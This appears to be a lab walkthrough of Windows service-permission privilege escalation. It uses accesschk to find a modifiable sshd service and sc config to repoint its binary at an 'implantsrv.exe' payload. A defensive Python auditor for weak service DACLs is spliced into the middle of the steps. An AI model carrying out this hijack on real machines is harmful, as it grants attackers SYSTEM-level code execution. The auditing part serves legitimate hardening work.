First: Let’s find the services that are modifiable by everyone

accesschk.exe -accepteula -wuvc "Everyone" *

No matching results

Let’s try services that members of the Users group can modify

accesschk.exe -accepteula -wuvc "Users" *

No matching results

Let’s try services that Authenticated Users can modify

accesschk.exe -accepteula -wuvc "Authenticated Users" *

And we have found the sshd service
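The same check can be run defensively as an audit over service security descriptors. This is an added example, not part of the original walkthrough: it parses SDDL strings in the form printed by sc sdshow and flags allow ACEs that give Everyone, Users or Authenticated Users the right to change a service's configuration, DACL or owner. The SDDL strings and the demo_svc name are constructed sample data.

```python
import re

# Rights that let the holder repoint or re-ACL a service:
# DC = SERVICE_CHANGE_CONFIG, WD = WRITE_DAC, WO = WRITE_OWNER, GA/GW = generic all/write.
HEX_BITS = {0x0002: "DC", 0x40000: "WD", 0x80000: "WO",
            0x10000000: "GA", 0x40000000: "GW"}
DANGEROUS = set(HEX_BITS.values())
# Broad trustees: the three groups queried with accesschk above.
BROAD = {"WD": "Everyone", "BU": "Users", "AU": "Authenticated Users"}

# Constructed sample descriptors (service name -> SDDL), not real captures.
SAMPLE = {
    "sshd": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
            "(A;;CCDCLCSWRPWPLORC;;;AU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "Spooler": "D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)",
    "demo_svc": "D:(A;;0xF01FF;;;BU)",
}

def dacl_aces(sddl):
    """Yield (type, rights, trustee) for each ACE in the DACL (D:) part only."""
    m = re.search(r"D:[^()]*((?:\([^()]*\))*)", sddl)
    if not m:
        return
    for body in re.findall(r"\(([^()]*)\)", m.group(1)):
        fields = body.split(";")
        if len(fields) >= 6:
            yield fields[0], fields[2], fields[5]

def rights_codes(rights):
    """Return the set of dangerous-right codes named by a letter or hex rights field."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {code for bit, code in HEX_BITS.items() if mask & bit}
    return {rights[i:i + 2] for i in range(0, len(rights), 2)} & DANGEROUS

def weak_services(descriptors):
    """Return sorted (service, group, rights) findings; only allow ACEs count."""
    findings = []
    for name, sddl in descriptors.items():
        for ace_type, rights, trustee in dacl_aces(sddl):
            hit = rights_codes(rights)
            if ace_type == "A" and trustee in BROAD and hit:
                findings.append((name, BROAD[trustee], sorted(hit)))
    return sorted(findings)

if __name__ == "__main__":
    for service, group, rights in weak_services(SAMPLE):
        print(f"{service}: {group} holds {','.join(rights)}")
```

Any service it reports should have the offending ACE removed from its DACL so that only administrators and SYSTEM can change its configuration.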

Second: View the service state

sc query sshd

Third: Modify service path to point to our malicious payload

sc config sshd binPath= "C:\\Users\\IEUser\\Desktop\\LPE\\implant\\implantsrv.exe"

Fourth: Start the service